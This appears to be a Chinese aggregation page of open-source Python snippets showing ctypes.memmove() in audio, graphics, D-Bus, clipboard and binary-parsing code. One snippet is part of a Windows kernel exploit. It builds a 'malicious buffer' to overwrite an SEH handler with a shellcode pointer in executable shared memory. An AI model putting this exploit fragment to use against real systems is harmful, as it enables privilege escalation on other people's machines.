我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用ctypes.memmove()。
def __new__(self): b = "00 00 00 00 14 01 00 00 03 00 10 01 00 01 0C 01 0B 01 02 00"\ " 02 00 01 01 02 01 02 01 2A 00 47 50 53 20 54 72 61 63 6B 20"\ " 50 4F 44 00 00 00 01 00 00 00 02 00 01 00 01 00 00 00 00 00"\ " 00 00 00 00 00 00 00 00 01 00 00 00 05 01 D0 00 06 01 3C 00"\ " 07 01 02 00 11 01 08 01 08 00 09 01 04 00 00 00 08 00 08 01"\ " 08 00 09 01 04 00 01 00 08 00 08 01 1A 00 09 01 04 00 02 00"\ " 00 00 0A 01 02 00 10 00 0A 01 02 00 01 00 0A 01 02 00 FE FF"\ " 06 01 42 00 07 01 02 00 23 01 08 01 08 00 09 01 04 00 00 00"\ " 08 00 08 01 08 00 09 01 04 00 01 00 28 00 08 01 20 00 09 01"\ " 04 00 02 00 00 00 0A 01 02 00 10 00 0A 01 02 00 08 00 0A 01"\ " 02 00 01 00 0A 01 02 00 FE FF 06 01 3C 00 07 01 02 00 22 01"\ " 08 01 08 00 09 01 04 00 00 00 18 00 08 01 08 00 09 01 04 00"\ " 01 00 19 00 08 01 1A 00 09 01 04 00 02 00 00 00 0A 01 02 00"\ " 32 00 0A 01 02 00 1A 00 0A 01 02 00 10 00 06 01 06 00 07 01"\ " 02 00 50 01" byte_object = bytes([int(a, 16) for a in b.split(" ")]) a = super().__new__(self) ctypes.memmove(ctypes.addressof(a.set_settings_request), bytes(byte_object), len(byte_object)) return a
def expand_array_in_blocks(m, block_length, offset): r, c = m.shape r = n_blocks(r, block_length) if offset > 0: block_length = 1 c = c * block_length output = np.ndarray((r, c), dtype=m.dtype) dst = output.ctypes.data frame_size = m.strides[0] for i in xrange(r): src = m.ctypes.data + int((i + offset) * frame_size) for j in xrange(block_length): ctypes.memmove(dst, src, frame_size) dst += int(frame_size) src += int(frame_size) return output
def __delitem__(self, i): size = self.size if i >= size: raise IndexError("list index out of range") if i < 0: i = size + i if i < 0: raise IndexError("list index out of range") # shift everything left by one address = ctypes.addressof(self.data) typesize = self._typesize to_address = address + i*typesize from_address = to_address + typesize ctypes.memmove(to_address, from_address, typesize*(size-i-1)) self.size = size = size-1 if self.prealloc_size > size*2: self.compact()
def append(self, obj): "append to the list; the object must be assignable to the ctype" size = self.size if size >= self.prealloc_size: # Need to make new space. There's no 'realloc' for # ctypes so this isn't as nice as it is in C. # I'm using Python's growth pattern, which is # 0, 4, 8, 16, 25, 35, 46, 58, 72, 88, ... if size < 9: newsize = (size>>3) + 3 + size else: newsize = (size>>3) + 6 + size newdata = (self.c_type * newsize)() ctypes.memmove(newdata, self.data, ctypes.sizeof(self.data)) self.data = newdata self.prealloc_size = newsize self.data[size] = obj self.size = size+1
def append_kwargs(self, **kwargs): "append to the list; assign each key/value to the new item" size = self.size if size >= self.prealloc_size: if size < 9: newsize = (size>>3) + 3 + size else: newsize = (size>>3) + 6 + size newdata = (self.c_type * newsize)() ctypes.memmove(newdata, self.data, ctypes.sizeof(self.data)) self.data = newdata self.prealloc_size = newsize obj = self.data[size] for k, v in kwargs.iteritems(): setattr(obj, k, v) self.size = size+1
def get_struct(input_stream, start_offset, class_name, param_list = None) : if param_list is None : param_list = [] structure = class_name(*param_list) # Unpack parameter list struct_len = ctypes.sizeof(structure) struct_data = input_stream[start_offset:start_offset + struct_len] fit_len = min(len(struct_data), struct_len) if (start_offset > file_end) or (fit_len < struct_len) : print(col_r + "Error: Offset 0x%X out of bounds, possibly incomplete image!" % start_offset + col_e) mce_exit(1) ctypes.memmove(ctypes.addressof(structure), struct_data, fit_len) return structure
def get_struct(input_stream, start_offset, class_name, param_list = None) : if param_list is None : param_list = [] structure = class_name(*param_list) # Unpack parameter list struct_len = ctypes.sizeof(structure) struct_data = input_stream[start_offset:start_offset + struct_len] fit_len = min(len(struct_data), struct_len) if (start_offset >= file_end) or (fit_len < struct_len) : err_stor.append(col_r + "Error: Offset 0x%X out of bounds, possibly incomplete image!" % start_offset + col_e) for error in err_stor : print(error) if param.multi : multi_drop() else: f.close() mea_exit(1) ctypes.memmove(ctypes.addressof(structure), struct_data, fit_len) return structure # Initialize PrettyTable
def create_map_file(): page_size = 0x1000 FILE_MAP_ALL_ACCESS = 0x1F SEH_overwrite_offset = 0x214 print "[+] Creating file mapping" shared_memory = kernel32.CreateFileMappingA(-1, None, win32con.PAGE_EXECUTE_READWRITE, 0, page_size, "SharedMemory") print "[+] Mapping it to current process space" shared_mapped_memory_address = kernel32.MapViewOfFile( shared_memory , FILE_MAP_ALL_ACCESS, 0, 0, page_size) print "[+] Map View of File at address: 0x%X" % shared_mapped_memory_address suitable_memory_for_buffer = shared_mapped_memory_address + (page_size - SEH_overwrite_offset) print "[+] Suitable Memory for Buffer address: 0x%X" % suitable_memory_for_buffer print "[+] Constructing malicious buffer" # [-- JUNK FOR PAGE --][-- KERNEL BUFFER SIZE--][-- STACK COOKIE --][-- JUNK --][-- SE/SHELLCODE PTR --] malicious_buffer = "A" * (page_size - SEH_overwrite_offset) + "B" * 0x200 + "S" * 4 + "C" * 12 + struct.pack("<L",heap_alloc_payload()) malicious_buffer_len = len(malicious_buffer) print "[+] Copying malicious buffer to file map" csrc = create_string_buffer(malicious_buffer, malicious_buffer_len) ctypes.memmove(shared_mapped_memory_address, addressof(csrc), malicious_buffer_len) return suitable_memory_for_buffer, SEH_overwrite_offset
def find_generic_password(kc_name, service, username): username = username.encode('utf-8') service = service.encode('utf-8') with open(kc_name) as keychain: length = c_uint32() data = c_void_p() status = SecKeychainFindGenericPassword( keychain, len(service), service, len(username), username, length, data, None) msg = "Can't fetch password from Keychain" NotFound.raise_for_status(status, msg) password = ctypes.create_string_buffer(length.value) ctypes.memmove(password, data.value, length.value) SecKeychainItemFreeContent(None, data) return password.raw.decode('utf-8')
def consume(self, bytes, audio_format): """Remove some data from beginning of packet. All events are cleared.""" self.events = () if bytes >= self.length: self.data = None self.length = 0 self.timestamp += self.duration self.duration = 0. return elif bytes == 0: return if not isinstance(self.data, str): # XXX Create a string buffer for the whole packet then # chop it up. Could do some pointer arith here and # save a bit of data pushing, but my guess is this is # faster than fudging aruond with ctypes (and easier). data = ctypes.create_string_buffer(self.length) ctypes.memmove(data, self.data, self.length) self.data = data self.data = self.data[bytes:] self.length -= bytes self.duration -= bytes / float(audio_format.bytes_per_second) self.timestamp += bytes / float(audio_format.bytes_per_second)
def update(self, source): """ Update the overlay with a new source of data. The new *source* buffer must have the same size as the original buffer used to create the overlay. There is currently no method for changing the size of an existing overlay (remove and recreate the overlay if you require this). """ port = self.renderer[0].input[0] fmt = port[0].format bp = ct.c_uint8 * (fmt[0].es[0].video.width * fmt[0].es[0].video.height * 3) try: sp = bp.from_buffer(source) except TypeError: sp = bp.from_buffer_copy(source) buf = mmal.mmal_queue_get(self.pool[0].queue) if not buf: raise PiCameraRuntimeError( "Couldn't get a buffer from the overlay's pool") ct.memmove(buf[0].data, sp, buf[0].alloc_size) buf[0].length = buf[0].alloc_size mmal_check( mmal.mmal_port_send_buffer(port, buf), prefix="Unable to send a buffer to the overlay's port")
def marshal(self) : "serializes this Message into the wire protocol format and returns a bytes object." buf = ct.POINTER(ct.c_ubyte)() nr_bytes = ct.c_int() if not dbus.dbus_message_marshal(self._dbobj, ct.byref(buf), ct.byref(nr_bytes)) : raise CallFailed("dbus_message_marshal") #end if result = bytearray(nr_bytes.value) ct.memmove \ ( ct.addressof((ct.c_ubyte * nr_bytes.value).from_buffer(result)), buf, nr_bytes.value ) dbus.dbus_free(buf) return \ result #end marshal
def ctypes2buffer(cptr, length): """Convert ctypes pointer to buffer type. Parameters ---------- cptr : ctypes.POINTER(ctypes.c_char) pointer to the raw memory region length : int the length of the buffer Returns ------- buffer : bytearray The raw byte memory buffer """ if not isinstance(cptr, ctypes.POINTER(ctypes.c_char)): raise TypeError('expected char pointer') res = bytearray(length) rptr = (ctypes.c_char * length).from_buffer(res) if not ctypes.memmove(rptr, cptr, length): raise RuntimeError('memmove failed') return res
def consume(self, bytes, audio_format): '''Remove some data from beginning of packet. All events are cleared.''' self.events = () if bytes == self.length: self.data = None self.length = 0 self.timestamp += self.duration self.duration = 0. return elif bytes == 0: return if not isinstance(self.data, str): # XXX Create a string buffer for the whole packet then # chop it up. Could do some pointer arith here and # save a bit of data pushing, but my guess is this is # faster than fudging aruond with ctypes (and easier). data = ctypes.create_string_buffer(self.length) ctypes.memmove(data, self.data, self.length) self.data = data self.data = self.data[bytes:] self.length -= bytes self.duration -= bytes / float(audio_format.bytes_per_second) self.timestamp += bytes / float(audio_format.bytes_per_second)
def find_generic_password(kc_name, service, username): username = username.encode('utf-8') service = service.encode('utf-8') with open(kc_name) as keychain: length = c_uint32() data = c_void_p() status = SecKeychainFindGenericPassword( keychain, len(service), service, len(username), username, length, data, None, ) msg = "Can't fetch password from system" NotFound.raise_for_status(status, msg) password = ctypes.create_string_buffer(length.value) ctypes.memmove(password, data.value, length.value) SecKeychainItemFreeContent(None, data) return password.raw.decode('utf-8')
def update(self, name, ub): PyBuffer_FromMemory = ctypes.pythonapi.PyBuffer_FromMemory ubo = self.UBs[name].ubo #print "using ubo handle %s" % ubo gl.glBindBuffer(gl.GL_UNIFORM_BUFFER, ubo) vp = gl.glMapBuffer(gl.GL_UNIFORM_BUFFER, gl.GL_WRITE_ONLY) #buffer = PyBuffer_FromMemory( # ctypes.c_void_p(vp), vbo.size #) to_p = ctypes.c_void_p(vp) from_p = ctypes.c_void_p(ub.listy.ctypes.data) #print to_p, from_p ctypes.memmove(to_p, from_p, ub.record_byte_size*len(ub.listy)) gl.glUnmapBuffer(gl.GL_UNIFORM_BUFFER)
def _send_shmem(self, bytes): # Use the outgoing stream and the outgoing shared memory. stream = self._streams.outgoing shared_memory = self._shared_memory.outgoing index = 0 # Send bytes via circular buffer. with self.Mutex(stream.mutex) as mutex: while index < len(bytes): while shared_memory.isFull: if ctypes.windll.kernel32.ReleaseMutex(stream.mutex) == 0: raise WindowsError("Could not release mutex") self._wait_for_object(stream.hasSpace) self._wait_for_object(stream.mutex) fragment_start = shared_memory.writeOffset max_length = (shared_memory.readOffset if fragment_start < shared_memory.readOffset else 5000)- fragment_start fragment_length = min(max_length, len(bytes) - index) ctypes.memmove(ctypes.addressof(shared_memory.buffer) + fragment_start, bytes[index:index+fragment_length], fragment_length) shared_memory.writeOffset = (fragment_start + fragment_length) % 5000 index += fragment_length shared_memory.isFull = (shared_memory.readOffset == shared_memory.writeOffset) if ctypes.windll.kernel32.SetEvent(stream.hasData) == 0: raise WindowsError("Could not set event")
def SetClipboardData(type, content): """ Modeled after http://msdn.microsoft.com/en-us/library/ms649016%28VS.85%29.aspx#_win32_Copying_Information_to_the_Clipboard """ allocators = { clipboard.CF_TEXT: ctypes.create_string_buffer, clipboard.CF_UNICODETEXT: ctypes.create_unicode_buffer, } if not type in allocators: raise NotImplementedError("Only text types are supported at this time") # allocate the memory for the data content = allocators[type](content) flags = memory.GMEM_MOVEABLE size = ctypes.sizeof(content) handle_to_copy = windll.kernel32.GlobalAlloc(flags, size) with LockedMemory(handle_to_copy) as lm: ctypes.memmove(lm.data_ptr, content, size) result = clipboard.SetClipboardData(type, handle_to_copy) if result is None: raise WindowsError()
def set_data(self, samples ): if type(samples) == list: for i,x in enumerate(samples): if i < sdds_sb_payload.NUM_SAMPLES: self.data[i] = x else: fit = min(len(samples), ctypes.sizeof(self)) ctypes.memmove(ctypes.addressof(self), samples, fit)
def set_data(self, samples ): if type(samples) == list: for i,x in enumerate(samples): if i < sdds_cb_payload.NUM_SAMPLES: self.data[i] = x else: fit = min(len(samples), ctypes.sizeof(self)) ctypes.memmove(ctypes.addressof(self), samples, fit)
def set_data(self, samples ): if type(samples) == list: for i,x in enumerate(samples): if i < sdds_si_payload.NUM_SAMPLES: self.data[i] = x else: fit = min(len(samples), ctypes.sizeof(self)) ctypes.memmove(ctypes.addressof(self), samples, fit)
def set_data(self, samples ): if type(samples) == list: for i,x in enumerate(samples): if i < sdds_ci_payload.NUM_SAMPLES: self.data[i] = x else: fit = min(len(samples), ctypes.sizeof(self)) ctypes.memmove(ctypes.addressof(self), samples, fit)
def set_data(self, samples ): if type(samples) == list: for i,x in enumerate(samples): if i < sdds_sn_payload.NUM_SAMPLES: self.data[i] = x else: fit = min(len(samples), ctypes.sizeof(self)) ctypes.memmove(ctypes.addressof(self), samples, fit)
def inet_ntop(address_family, packed_ip): if address_family == socket.AF_INET: return socket.inet_ntoa(packed_ip) addr = sockaddr() addr.sa_family = address_family addr_size = ctypes.c_int(ctypes.sizeof(addr)) ip_string = ctypes.create_string_buffer(128) ip_string_size = ctypes.c_int(ctypes.sizeof(ip_string)) if address_family == socket.AF_INET6: if len(packed_ip) != ctypes.sizeof(addr.ipv6_addr): raise socket.error('packed IP wrong length for inet_ntoa') ctypes.memmove(addr.ipv6_addr, packed_ip, 16) else: raise socket.error('unknown address family') if WSAAddressToStringA( ctypes.byref(addr), addr_size, None, ip_string, ctypes.byref(ip_string_size) ) != 0: raise socket.error(ctypes.FormatError()) return ip_string[:ip_string_size.value - 1]
def compact(self): "remove any space preallocated for growth" if self.prealloc_size == self.size: return newdata = (self.c_type * self.size)() ctypes.memmove(newdata, self.data, self.size*self._typesize) self.data = newdata self.prealloc_size = self.size
def write_variable(self, BType, name, value): new_ctypes_obj = BType._to_ctypes(value) ctypes_obj = BType._ctype.in_dll(self.cdll, name) ctypes.memmove(ctypes.addressof(ctypes_obj), ctypes.addressof(new_ctypes_obj), ctypes.sizeof(BType._ctype))
def read(cls, byte_object): a = cls(byte_object) # print(byte_object) ctypes.memmove(ctypes.addressof(a.data), bytes(byte_object), min(len(byte_object), ctypes.sizeof(a.data))) return a
def read(cls, byte_object): a = cls() ctypes.memmove(ctypes.addressof(a), bytes(byte_object), min(len(byte_object), ctypes.sizeof(cls))) return a # Mixin to allow conversion of a ctypes structure to and from a dictionary.
def load_settings(cls, b): a = cls() ctypes.memmove(ctypes.addressof(a.start_of_settings), bytes(b), min(len(b), ctypes.sizeof(a))) return a
def read(cls, byte_object): a = cls() a.body_length = len(byte_object) - ctypes.sizeof(Command) ctypes.memmove(ctypes.addressof(a), bytes(byte_object), min(len(byte_object), ctypes.sizeof(cls))) return a
def __bytes__(self): length = self.body_length + ctypes.sizeof(Command) a = ctypes.create_string_buffer(length) ctypes.memmove(ctypes.addressof(a), ctypes.addressof(self), length) return bytes(a)
def load_payload(self, b): self.body_length = len(b) + 8 # II from position, length ctypes.memmove(ctypes.addressof(self.data_reply.data), bytes(b), len(b)) self.command.packet_length = self.body_length
def try_generate_stub_target(shellcode, argument_buffer, target, errcheck=None): if not windows.current_process.is_wow_64: raise ValueError("Calling execute_64bits_code_from_syswow from non-syswow process") native_caller = generate_64bits_execution_stub_from_syswow(shellcode) native_caller.errcheck = errcheck if errcheck is not None else target.errcheck # Generate the wrapper function that fill the argument_buffer expected_arguments_number = len(target.prototype._argtypes_) def wrapper(*args): if len(args) != expected_arguments_number: raise ValueError("{0} syswow accept {1} args ({2} given)".format(target.__name__, expected_arguments_number, len(args))) # Transform args (ctypes byref possibly) to int writable_args = [] for i, value in enumerate(args): if not isinstance(value, (int, long)): try: value = ctypes.cast(value, ctypes.c_void_p).value except ctypes.ArgumentError as e: raise ctypes.ArgumentError("Argument {0}: wrong type <{1}>".format(i, type(value).__name__)) writable_args.append(value) # Build buffer buffer = struct.pack("<" + "Q" * len(writable_args), *writable_args) ctypes.memmove(argument_buffer, buffer, len(buffer)) # Copy origincal args in function, for errcheck if needed native_caller.current_original_args = args # TODO: THIS IS NOT THREAD SAFE return native_caller() wrapper.__name__ = "{0}<syswow64>".format(target.__name__,) wrapper.__doc__ = "This is a wrapper to {0} in 64b mode, it accept <{1}> args".format(target.__name__, expected_arguments_number) return wrapper
def swallow_ctypes_copy(ctypes_object): new_copy = type(ctypes_object)() ctypes.memmove(ctypes.byref(new_copy), ctypes.byref(ctypes_object), ctypes.sizeof(new_copy)) return new_copy # type replacement based on name
def _set_argv(process_name): """ Overwrites our argv in a similar fashion to how it's done in C with: strcpy(argv[0], 'new_name'); """ if Py_GetArgcArgv is None: return global _PROCESS_NAME # both gets the current process name and initializes _MAX_NAME_LENGTH current_name = get_process_name() argv, argc = ctypes.c_int(0), argc_t() Py_GetArgcArgv(argv, ctypes.pointer(argc)) if len(process_name) > _MAX_NAME_LENGTH: raise IOError("Can't rename process to something longer than our initial name (this would overwrite memory used for the env)") # space we need to clear zero_size = max(len(current_name), len(process_name)) ctypes.memset(argc.contents, 0, zero_size + 1) # null terminate the string's end process_name_encoded = process_name.encode('utf8') ctypes.memmove(argc.contents, process_name_encoded, len(process_name)) _PROCESS_NAME = process_name
def _finish_wrapped_array(self, array): # IS_PYPY """ Hardcore way to inject numpy array in bitmap. """ # Get bitmap info with self._fi as lib: pitch = lib.FreeImage_GetPitch(self._bitmap) bits = lib.FreeImage_GetBits(self._bitmap) bpp = lib.FreeImage_GetBPP(self._bitmap) # Get channels and realwidth nchannels = bpp // 8 // array.itemsize realwidth = pitch // nchannels # Apply padding for pitch if necessary extra = realwidth - array.shape[-2] assert extra >= 0 and extra < 10 # Make sort of Fortran, also take padding (i.e. pitch) into account newshape = array.shape[-1], realwidth, nchannels array2 = numpy.zeros(newshape, array.dtype) if nchannels == 1: array2[:, :array.shape[-2], 0] = array.T else: for i in range(nchannels): array2[:, :array.shape[-2], i] = array[i, :, :].T # copy data data_ptr = array2.__array_interface__['data'][0] ctypes.memmove(bits, data_ptr, array2.nbytes) del array2
def write_to_buffer(buffer, data, offset=0): if isinstance(buffer, ctypes.POINTER(ctypes.c_byte)): ctypes.memmove(buffer, data, len(data)) return if offset == 0: buffer.value = data else: buffer.value = buffer.raw[0:offset] + data
def struct_from_buffer(library, type_, buffer): class_ = getattr(library, type_) value = class_() ctypes.memmove(ctypes.addressof(value), buffer, ctypes.sizeof(class_)) return ctypes.pointer(value)
def draw_infrared_frame(self, frame, target_surface): if frame is None: # some usb hub do not provide the infrared image. it works with Kinect studio though return target_surface.lock() f8=np.uint8(frame.clip(1,4000)/16.) frame8bit=np.dstack((f8,f8,f8)) address = self._kinect.surface_as_array(target_surface.get_buffer()) ctypes.memmove(address, frame8bit.ctypes.data, frame8bit.size) del address target_surface.unlock()
def draw_color_frame(self, frame, target_surface): target_surface.lock() address = self._kinect.surface_as_array(target_surface.get_buffer()) ctypes.memmove(address, frame.ctypes.data, frame.size) del address target_surface.unlock()